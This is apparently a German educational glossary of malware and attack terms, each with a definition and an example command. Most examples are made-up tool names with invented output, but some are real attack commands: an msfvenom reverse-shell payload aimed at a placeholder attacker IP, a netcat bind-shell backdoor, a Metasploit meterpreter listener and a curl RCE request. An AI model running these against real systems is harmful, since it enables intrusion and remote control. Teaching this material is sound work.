Malware, Viren etc.

1. Malware 🚨

  • Definition: Malware ist bösartige Software, entwickelt für schädliche Aktionen wie unautorisierten Zugang oder Datenzerstörung.

  • Typen: Virus, Wurm, Trojaner, Ransomware, Spyware.

  • Beispiel:

    • Ransomware: Ein Angreifer nutzt ein Phishing-Mail, um einen Benutzer dazu zu bringen, eine infizierte Datei herunterzuladen, die dann alle Dateien verschlüsselt.

    $ ./ransomware_tool --encrypt /home/user/documents
    Dateien verschlüsselt, Kontaktieren Sie uns für den Entschlüsselungscode.

2. Payload 🎯

  • Definition: Der Teil der Malware, der die schädliche Wirkung entfaltet, z.B. Daten löschen oder eine Shell öffnen.

  • Beispiel:

    • Reverse Shell Payload: Nutze Metasploit, um eine Reverse Shell zu generieren.

    $ msfvenom -p linux/x86/shell_reverse_tcp LHOST={attacker_IP} LPORT=4444 -f elf > payload.elf
    Successfully created: payload.elf

    Der Payload erlaubt es, eine Verbindung vom Zielsystem zurück zum Angreifer aufzubauen, um eine Shell zu bekommen.

3. Zero-Day 🕳️

  • Definition: Eine unbekannte Sicherheitslücke, die noch nicht gepatcht wurde.

  • Zero-Day Exploit: Ein Angriff, der eine Zero-Day-Schwachstelle ausnutzt.

  • Beispiel:

    • Exploitieren einer Zero-Day-Lücke:

    $ exploit zero-day_target_module --target={vulnerable_version}
    Successfully exploited zero-day vulnerability.

    Ein Angreifer nutzt eine ungepatchte Schwachstelle in einem Webserver aus, um Remote-Code auszuführen.

4. Exploit 💥

  • Definition: Ein Code oder eine Methode, um eine Schwachstelle auszunutzen.

  • Typen: Remote Code Execution (RCE), Privilege Escalation.

  • Beispiel:

    • Privilege Escalation Exploit:

    $ sudo exploit_privilege --gain-root
    Privilegien erfolgreich erhöht: Sie sind jetzt Root!

    Ein Angreifer nutzt eine lokale Schwachstelle, um seine Berechtigungen auf ein Administratorkonto zu erhöhen.

5. Rootkit 🛠️

  • Definition: Software, die darauf ausgelegt ist, Malware auf einem System zu verstecken und den dauerhaften Zugriff sicherzustellen.

  • Typen: User-Mode Rootkit, Kernel-Mode Rootkit.

  • Beispiel:

    • Kernel-Mode Rootkit:

    $ insmod knark.o
    Knark Rootkit erfolgreich geladen.
    
    # Verstecke einen Prozess
    $ hide_proc 1234
    Prozess 1234 versteckt.

    Ein Kernel-Rootkit wird geladen, um die Anwesenheit eines bösartigen Prozesses zu verschleiern.

6. Backdoor 🔓

  • Definition: Ein versteckter Zugang zu einem System, um später erneut Zugriff zu erhalten.

  • Beispiele: Netcat Listening Service, versteckte SSH-Zugänge.

  • Beispiel:

    • Netcat Backdoor:

    $ nc -lvp 4444 -e /bin/bash
    Listening on [any] 4444 ...

    Netcat wird als Backdoor eingerichtet, um später wieder auf das System zugreifen zu können.

7. Trojaner 🐴

  • Definition: Malware, die sich als legitime Software tarnt, um Hintertüren zu öffnen.

  • Beispiel:

    • Falsches Installationsprogramm:

    $ ./legit_software_installer
    Installing software...
    Trojaner installiert: Backdoor wurde geöffnet.

    Der Benutzer führt eine vermeintlich legitime Installationsdatei aus, die zusätzlich einen Trojaner installiert, um einen Fernzugriff zu ermöglichen.

8. Virus 🦠

  • Definition: Schadsoftware, die sich in bestehende Programme einfügt und sich damit verbreitet.

  • Beispiel:

    • Selbstreplizierender Virus:

    $ ./infect_file --target=/usr/bin/example_program
    Infizierte Datei /usr/bin/example_program: Virus-Code eingefügt.

    Der Virus wird in eine existierende Datei eingebettet und verbreitet sich, wenn das Programm ausgeführt wird.

9. Wurm 🐛

  • Definition: Malware, die sich selbstständig im Netzwerk verbreitet.

  • Beispiel:

    • Netzwerk-Wurm:

    $ ./worm --spread --target-network 192.168.0.0/24
    Verbreitung gestartet: 5 neue Geräte infiziert.

    Der Wurm verbreitet sich automatisch im Netzwerk, ohne Benutzereingriff.

10. Ransomware 🔒

  • Definition: Malware, die Daten verschlüsselt und ein Lösegeld fordert.

  • Beispiel:

    • Datenverschlüsselung:

    $ ./ransomware --encrypt /home/user/files
    Dateien verschlüsselt. Zahlung erforderlich, um Entschlüsselungsschlüssel zu erhalten.

11. Spyware 👀

  • Definition: Software, die Daten über den Benutzer ohne dessen Wissen sammelt.

  • Beispiel:

    • Keylogger:

    $ ./spyware --log-keystrokes
    Tastatureingaben werden protokolliert.

    Die Spyware sammelt alle Tastenanschläge, um sensible Informationen zu stehlen.

12. Remote Code Execution (RCE) 🌐

  • Definition: Ein Exploit-Typ, der die Ausführung von Code auf einem entfernten System ermöglicht.

  • Beispiel:

    • RCE auf einem Webserver:

    $ curl -X POST "http://target.com/vuln" -d "cmd=whoami"
    Response: root

    Hier wird eine Schwachstelle genutzt, um Remote-Befehle auf einem Zielwebserver auszuführen.

13. Privilege Escalation ⬆️

  • Definition: Ausnutzung von Schwachstellen, um höhere Berechtigungen zu erlangen.

  • Beispiel:

    • Ausnutzen einer fehlerhaften Konfiguration:

    $ sudo -u root /bin/bash
    Sie sind jetzt Root!

    Der Benutzer nutzt eine fehlerhafte Konfiguration aus, die es ihm erlaubt, Root-Berechtigungen zu erhalten.

14. Keylogger ⌨️

  • Definition: Ein Tool, das alle Tastenanschläge des Benutzers aufzeichnet.

  • Beispiel:

    • Keylogger-Einsatz:

    $ ./keylogger --output=/tmp/keystrokes.log
    Tastatureingaben werden in /tmp/keystrokes.log protokolliert.

    Der Keylogger speichert die Tastenanschläge, um später Passwörter und sensible Daten zu stehlen.

15. Command & Control (C2) 🎛️

  • Definition: Infrastruktur, die Angreifer verwenden, um kompromittierte Geräte fernzusteuern.

  • Beispiel:

    • C2-Server mit Metasploit:

    $ msfconsole
    msf > use exploit/multi/handler
    msf > set PAYLOAD windows/meterpreter/reverse_tcp
    msf > set LHOST {attacker_IP}
    msf > set LPORT 4444
    msf > exploit
    Meterpreter session 1 opened

    Hier wird ein C2-Server eingerichtet, um ein kompromittiertes System zu steuern.

16. Botnet 🤖

  • Definition: Ein Netzwerk von infizierten Computern, die von einem Angreifer zentral gesteuert werden.

  • Beispiel:

    • DDoS-Angriff mit Botnet:

    $ ./botnet_controller --attack-ddos http://target.com --bots=1000
    Starten eines DDoS-Angriffs auf http://target.com mit 1000 Bots.

    Der Angreifer nutzt ein Botnet, um einen verteilten Denial-of-Service-Angriff (DDoS) auf eine Website durchzuführen.

Last updated